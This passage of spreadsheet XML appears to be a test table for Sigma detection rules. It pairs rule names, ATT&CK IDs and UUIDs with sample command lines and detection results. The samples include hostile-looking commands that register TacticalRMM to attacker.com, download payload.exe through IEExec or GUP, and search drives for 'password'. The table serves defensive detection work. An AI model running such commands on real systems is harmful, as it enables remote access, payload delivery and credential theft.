          <t>tacticalrmm.exe --api http://attacker.com --auth token --client-id=1 --site-id=2 --agent-type=mesh</t>
        </is>
      </c>
      <c r="F579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I579" s="43" t="n"/>
      <c r="J579" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K579" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="580" ht="15.75" customHeight="1" s="42">
      <c r="A580" s="43" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B580" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_tacticalrmm_agent_registration_via_cli</t>
        </is>
      </c>
      <c r="C580" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server</t>
        </is>
      </c>
      <c r="D580" s="43" t="inlineStr">
        <is>
          <t>2db93a3f-3249-4f73-9e68-0e77a0f8ae7e</t>
        </is>
      </c>
      <c r="E580" s="43" t="inlineStr">
        <is>
          <t>tacticalrmm.exe --api http://attacker.com --auth token --client-id 1 --site-id 2 --agent-type workstation</t>
        </is>
      </c>
      <c r="F580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I580" s="43" t="n"/>
      <c r="J580" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K580" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="581" ht="15.75" customHeight="1" s="42">
      <c r="A581" s="43" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B581" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_tacticalrmm_agent_registration_via_cli</t>
        </is>
      </c>
      <c r="C581" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server</t>
        </is>
      </c>
      <c r="D581" s="43" t="inlineStr">
        <is>
          <t>2db93a3f-3249-4f73-9e68-0e77a0f8ae7e</t>
        </is>
      </c>
      <c r="E581" s="43" t="inlineStr">
        <is>
          <t>tacticalrmm.exe --api http://attacker.com --auth token --client-id 1 --site-id 2 --agent-type mesh --</t>
        </is>
      </c>
      <c r="F581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I581" s="43" t="n"/>
      <c r="J581" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K581" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="582" ht="15.75" customHeight="1" s="42">
      <c r="A582" s="43" t="inlineStr">
        <is>
          <t>t1071.001</t>
        </is>
      </c>
      <c r="B582" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_execution</t>
        </is>
      </c>
      <c r="C582" s="43" t="inlineStr">
        <is>
          <t>Visual Studio Code Tunnel Execution</t>
        </is>
      </c>
      <c r="D582" s="43" t="inlineStr">
        <is>
          <t>90d6bd71-dffb-4989-8d86-a827fedd6624</t>
        </is>
      </c>
      <c r="E582" s="43" t="inlineStr">
        <is>
          <t>code.exe tunnel --accept-server-license-terms</t>
        </is>
      </c>
      <c r="F582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I582" s="43" t="n"/>
      <c r="J582" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K582" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="583" ht="15.75" customHeight="1" s="42">
      <c r="A583" s="43" t="inlineStr">
        <is>
          <t>t1071.001</t>
        </is>
      </c>
      <c r="B583" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_execution</t>
        </is>
      </c>
      <c r="C583" s="43" t="inlineStr">
        <is>
          <t>Visual Studio Code Tunnel Execution</t>
        </is>
      </c>
      <c r="D583" s="43" t="inlineStr">
        <is>
          <t>90d6bd71-dffb-4989-8d86-a827fedd6624</t>
        </is>
      </c>
      <c r="E583" s="43" t="inlineStr">
        <is>
          <t>code.exe  tunnel   --accept-server-license-terms</t>
        </is>
      </c>
      <c r="F583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I583" s="43" t="n"/>
      <c r="J583" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K583" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="584" ht="15.75" customHeight="1" s="42">
      <c r="A584" s="43" t="inlineStr">
        <is>
          <t>t1071.001</t>
        </is>
      </c>
      <c r="B584" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_execution</t>
        </is>
      </c>
      <c r="C584" s="43" t="inlineStr">
        <is>
          <t>Visual Studio Code Tunnel Execution</t>
        </is>
      </c>
      <c r="D584" s="43" t="inlineStr">
        <is>
          <t>90d6bd71-dffb-4989-8d86-a827fedd6624</t>
        </is>
      </c>
      <c r="E584" s="43" t="inlineStr">
        <is>
          <t>"code.exe" tunnel --accept-server-license-terms</t>
        </is>
      </c>
      <c r="F584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I584" s="43" t="n"/>
      <c r="J584" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K584" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="585" ht="15.75" customHeight="1" s="42">
      <c r="A585" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B585" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C585" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D585" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E585" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" &amp;&amp; echo Done</t>
        </is>
      </c>
      <c r="F585" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G585" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I585" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J585" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K585" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="586" ht="15.75" customHeight="1" s="42">
      <c r="A586" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B586" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C586" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D586" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E586" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^| more</t>
        </is>
      </c>
      <c r="F586" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G586" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H586" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I586" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J586" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K586" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="587" ht="15.75" customHeight="1" s="42">
      <c r="A587" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B587" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C587" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D587" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E587" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^&gt;^&gt; NUL</t>
        </is>
      </c>
      <c r="F587" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G587" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H587" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I587" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J587" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K587" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="588" ht="15.75" customHeight="1" s="42">
      <c r="A588" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B588" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C588" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D588" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E588" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^&lt; NUL</t>
        </is>
      </c>
      <c r="F588" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G588" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H588" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I588" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J588" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K588" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="589" ht="15.75" customHeight="1" s="42">
      <c r="A589" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B589" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C589" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D589" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E589" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^&lt;^&gt; NUL</t>
        </is>
      </c>
      <c r="F589" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I589" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa); Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa)</t>
        </is>
      </c>
      <c r="J589" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K589" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="590" ht="15.75" customHeight="1" s="42">
      <c r="A590" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B590" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C590" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D590" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E590" s="43" t="inlineStr">
        <is>
          <t>findstr /s /i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F590" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G590" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H590" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I590" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa)</t>
        </is>
      </c>
      <c r="J590" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K590" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="591" ht="15.75" customHeight="1" s="42">
      <c r="A591" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B591" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C591" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D591" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E591" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c findstr /s /i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F591" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G591" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H591" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I591" s="43" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location (b2b048b0-7857-4380-b0fb-d3f0ab820b71)</t>
        </is>
      </c>
      <c r="J591" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K591" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="592" ht="15.75" customHeight="1" s="42">
      <c r="A592" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B592" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C592" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D592" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E592" s="43" t="inlineStr">
        <is>
          <t>copy findstr.exe grep.exe &amp;&amp; grep.exe /s /i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F592" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G592" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H592" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I592" s="43" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location (b2b048b0-7857-4380-b0fb-d3f0ab820b71)</t>
        </is>
      </c>
      <c r="J592" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K592" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="593" ht="15.75" customHeight="1" s="42">
      <c r="A593" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B593" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C593" s="43" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D593" s="43" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E593" s="43" t="inlineStr">
        <is>
          <t>MpCmdRun.exe -DownloadFile -url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F593" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G593" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I593" s="43" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy (727454c0-d851-48b0-8b89-385611ab0704)</t>
        </is>
      </c>
      <c r="J593" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K593" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="594" ht="15.75" customHeight="1" s="42">
      <c r="A594" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B594" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gfxdownloadwrapper_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C594" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via GfxDownloadWrapper.EXE</t>
        </is>
      </c>
      <c r="D594" s="43" t="inlineStr">
        <is>
          <t>eee00933-a761-4cd0-be70-c42fe91731e7</t>
        </is>
      </c>
      <c r="E594" s="43" t="inlineStr">
        <is>
          <t>GfxDownloadWrapper.exe https://gameplayapi.intel.com/legitfile.exe</t>
        </is>
      </c>
      <c r="F594" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G594" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H594" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I594" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage (9292293b-8496-4715-9db6-37028dcda4b3)</t>
        </is>
      </c>
      <c r="J594" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K594" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="595" ht="15.75" customHeight="1" s="42">
      <c r="A595" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B595" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gfxdownloadwrapper_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C595" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via GfxDownloadWrapper.EXE</t>
        </is>
      </c>
      <c r="D595" s="43" t="inlineStr">
        <is>
          <t>eee00933-a761-4cd0-be70-c42fe91731e7</t>
        </is>
      </c>
      <c r="E595" s="43" t="inlineStr">
        <is>
          <t>GfxDownloadWrapper.exe "https://gameplayapi.intel.com/legitfile.exe"</t>
        </is>
      </c>
      <c r="F595" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G595" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H595" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I595" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage (9292293b-8496-4715-9db6-37028dcda4b3)</t>
        </is>
      </c>
      <c r="J595" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K595" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="596" ht="15.75" customHeight="1" s="42">
      <c r="A596" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B596" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gfxdownloadwrapper_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C596" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via GfxDownloadWrapper.EXE</t>
        </is>
      </c>
      <c r="D596" s="43" t="inlineStr">
        <is>
          <t>eee00933-a761-4cd0-be70-c42fe91731e7</t>
        </is>
      </c>
      <c r="E596" s="43" t="inlineStr">
        <is>
          <t>GfxDownloadWrapper.exe https://gameplayapi.intel.com/legitfile.exe\</t>
        </is>
      </c>
      <c r="F596" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G596" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H596" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I596" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage (9292293b-8496-4715-9db6-37028dcda4b3)</t>
        </is>
      </c>
      <c r="J596" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K596" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="597" ht="15.75" customHeight="1" s="42">
      <c r="A597" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B597" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gfxdownloadwrapper_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C597" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via GfxDownloadWrapper.EXE</t>
        </is>
      </c>
      <c r="D597" s="43" t="inlineStr">
        <is>
          <t>eee00933-a761-4cd0-be70-c42fe91731e7</t>
        </is>
      </c>
      <c r="E597" s="43" t="inlineStr">
        <is>
          <t>GfxDownloadWrapper.exe https://gameplayapi.intel.com/legitfile.exe # comment</t>
        </is>
      </c>
      <c r="F597" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G597" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H597" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I597" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J597" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K597" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="598" ht="15.75" customHeight="1" s="42">
      <c r="A598" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B598" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gup_download</t>
        </is>
      </c>
      <c r="C598" s="43" t="inlineStr">
        <is>
          <t>File Download Using Notepad++ GUP Utility</t>
        </is>
      </c>
      <c r="D598" s="43" t="inlineStr">
        <is>
          <t>44143844-0631-49ab-97a0-96387d6b2d7c</t>
        </is>
      </c>
      <c r="E598" s="43" t="inlineStr">
        <is>
          <t>GUP.exe -unzipTo=C:\Temp https://example.com/payload.zip</t>
        </is>
      </c>
      <c r="F598" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G598" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H598" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I598" s="43" t="inlineStr">
        <is>
          <t>Suspicious Certreq Command to Download (4480827a-9799-4232-b2c4-ccc6c4e9e12b)</t>
        </is>
      </c>
      <c r="J598" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K598" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="599" ht="15.75" customHeight="1" s="42">
      <c r="A599" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B599" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ieexec_download</t>
        </is>
      </c>
      <c r="C599" s="43" t="inlineStr">
        <is>
          <t>File Download And Execution Via IEExec.EXE</t>
        </is>
      </c>
      <c r="D599" s="43" t="inlineStr">
        <is>
          <t>9801abb8-e297-4dbf-9fbd-57dde0e830ad</t>
        </is>
      </c>
      <c r="E599" s="43" t="inlineStr">
        <is>
          <t>IEExec.exe https://example.com/payload.exe</t>
        </is>
      </c>
      <c r="F599" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G599" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H599" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I599" s="43" t="inlineStr">
        <is>
          <t>Potential COM Objects Download Cradles Usage - Process Creation (02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf); Potential COM Objects Download Cradles Usage - Process Creation (02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf)</t>
        </is>
      </c>
      <c r="J599" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K599" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="600" ht="15.75" customHeight="1" s="42">
      <c r="A600" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B600" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ieexec_download</t>
        </is>
      </c>
      <c r="C600" s="43" t="inlineStr">
        <is>
          <t>File Download And Execution Via IEExec.EXE</t>
        </is>
      </c>
      <c r="D600" s="43" t="inlineStr">
        <is>
          <t>9801abb8-e297-4dbf-9fbd-57dde0e830ad</t>
        </is>
      </c>
      <c r="E600" s="43" t="inlineStr">
        <is>
          <t>IEExec.exe \\?\C:\\IEExec.exe https://example.com/payload.exe</t>
        </is>
      </c>
      <c r="F600" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G600" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H600" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I600" s="43" t="inlineStr">
        <is>
          <t>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J600" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K600" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="601" ht="15.75" customHeight="1" s="42">
      <c r="A601" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B601" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ieexec_download</t>
        </is>
      </c>
      <c r="C601" s="43" t="inlineStr">
        <is>
          <t>File Download And Execution Via IEExec.EXE</t>
        </is>
      </c>
      <c r="D601" s="43" t="inlineStr">
        <is>
          <t>9801abb8-e297-4dbf-9fbd-57dde0e830ad</t>
        </is>
      </c>
      <c r="E601" s="43" t="inlineStr">
        <is>
          <t>IEExec.exe https://example.com/payload.exe &gt; NUL</t>
        </is>
      </c>
      <c r="F601" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G601" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I601" s="43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601" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K601" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="602" ht="15.75" customHeight="1" s="42">
      <c r="A602" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B602" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_diantz_remote_cab</t>
        </is>
      </c>
      <c r="C602" s="43" t="inlineStr">
        <is>
          <t>Suspicious Diantz Download and Compress Into a CAB File</t>
        </is>
      </c>
      <c r="D602" s="43" t="inlineStr">
        <is>
          <t>185d7418-f250-42d0-b72e-0c8b70661e93</t>
        </is>
      </c>
      <c r="E602" s="43" t="inlineStr">
        <is>
          <t>diantz.exe payload.exe C:\Windows\Tasks\archive.cab</t>
        </is>
      </c>
      <c r="F602" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G602" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H602" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I602" s="43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602" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K602" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="603" ht="15.75" customHeight="1" s="42">
      <c r="A603" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B603" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_diantz_remote_cab</t>
        </is>
      </c>
      <c r="C603" s="43" t="inlineStr">
        <is>
          <t>Suspicious Diantz Download and Compress Into a CAB File</t>
        </is>
      </c>
      <c r="D603" s="43" t="inlineStr">
        <is>
          <t>185d7418-f250-42d0-b72e-0c8b70661e93</t>
        </is>
      </c>
      <c r="E603" s="43" t="inlineStr">
        <is>
          <t>diantz.exe payload.exe C:\Windows\Tasks\archive.cab.txt</t>
        </is>
      </c>
      <c r="F603" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G603" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H603" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I603" s="43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603" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K603" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="604" ht="15.75" customHeight="1" s="42">
      <c r="A604" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B604" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_diantz_remote_cab</t>
        </is>
      </c>
      <c r="C604" s="43" t="inlineStr">
        <is>
          <t>Suspicious Diantz Download and Compress Into a CAB File</t>
        </is>
      </c>
      <c r="D604" s="43" t="inlineStr">
        <is>
          <t>185d7418-f250-42d0-b72e-0c8b70661e93</t>
        </is>
      </c>
      <c r="E604" s="43" t="inlineStr">
        <is>
          <t>diantz.exe payload.exe C:\Windows\Tasks\archive.cab\</t>
        </is>
      </c>
      <c r="F604" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G604" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H604" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I604" s="43" t="inlineStr">
        <is>
          <t>Potential Data Exfiltration Activity Via CommandLine Tools (7d1aaf3d-4304-425c-b7c3-162055e0b3ab); Potential Data Exfiltration Activity Via CommandLine Tools (7d1aaf3d-4304-425c-b7c3-162055e0b3ab); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J604" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K604" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="605" ht="15.75" customHeight="1" s="42">
      <c r="A605" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B605" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_diantz_remote_cab</t>
        </is>
      </c>
      <c r="C605" s="43" t="inlineStr">
        <is>
